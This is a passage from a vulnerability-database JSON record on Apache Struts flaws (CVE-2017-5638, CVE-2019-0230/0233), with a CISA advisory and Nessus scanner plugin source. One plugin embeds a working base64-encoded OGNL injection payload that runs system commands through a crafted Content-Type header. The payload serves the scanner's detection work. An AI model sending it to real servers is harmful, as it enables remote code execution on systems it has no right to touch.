"packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:160108"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-0230", "RH:CVE-2019-0233"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:966010900F7632E797C552D31C2BB53A", "SAINT:AE1DA80E6B0E4C12B5D781794166897B"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:D6FED8C7635FDB50C271368C9373B439"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:BED35CFCFED307909DB60602551982A6", "THREATPOST:C4D1E87CE4261EC62077E4F157643132", "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0230", "UB:CVE-2019-0233"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0230", "epss": "0.856390000", "percentile": "0.979350000", "modified": "2023-03-16"}, {"cve": "CVE-2019-0233", "epss": "0.161130000", "percentile": "0.950770000", "modified": "2023-03-16"}, {"cve": "CVE-2020-5135", "epss": "0.013480000", "percentile": "0.840580000", "modified": "2023-03-16"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1678918916, "score": 1698840310, "epss": 1679002791}, "_internal": {"score_hash": "34a39e64d802d543e669f448fc115eb2"}}

{"cisa": [{"lastseen": "2021-02-24T18:06:45", "description": "The Apache Software Foundation has released a security advisory to address vulnerabilities in Struts in the version range 2.0.0\u20142.5.20. An attacker could exploit one of these vulnerabilities to take control of an affected system. The current version, Struts 2.5.22, is not affected.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache\u2019s security advisory for [CVE-2019-0230 and CVE-2019-0233](<http://mail-archives.us.apache.org/mod_mbox/www-announce/202008.mbox/%3C66006167-999e-a1e5-4a3a-5f1c75a1e8a2%40apache.org%3E>) and upgrade to the appropriate version.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "cisa", "title": "Apache Releases Security Advisory for Struts 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-08-14T00:00:00", "id": "CISA:3D9E69A26C68866B64ED6E4B31E270E6", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-11-04T00:00:23", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the K35226442 advisory.\n\n - An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload. (CVE-2019-0233)\n\n - Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. (CVE-2019-0230)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-11-03T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Apache Struts vulnerabilities (K35226442)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL35226442.NASL", "href": "https://www.tenable.com/plugins/nessus/184328", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K35226442.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(184328);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"F5 Networks BIG-IP : Apache Struts vulnerabilities (K35226442)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the K35226442 advisory.\n\n - An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when\n performing a file upload. (CVE-2019-0233)\n\n - Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag\n attributes, may lead to remote code execution. (CVE-2019-0230)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://my.f5.com/manage/s/article/K35226442\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K35226442.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/11/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K35226442';\nvar vmatrix = {\n 'AM': {\n 'affected': [\n '15.1.0','14.1.0-14.1.2','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running the affected module AM');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:40", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a 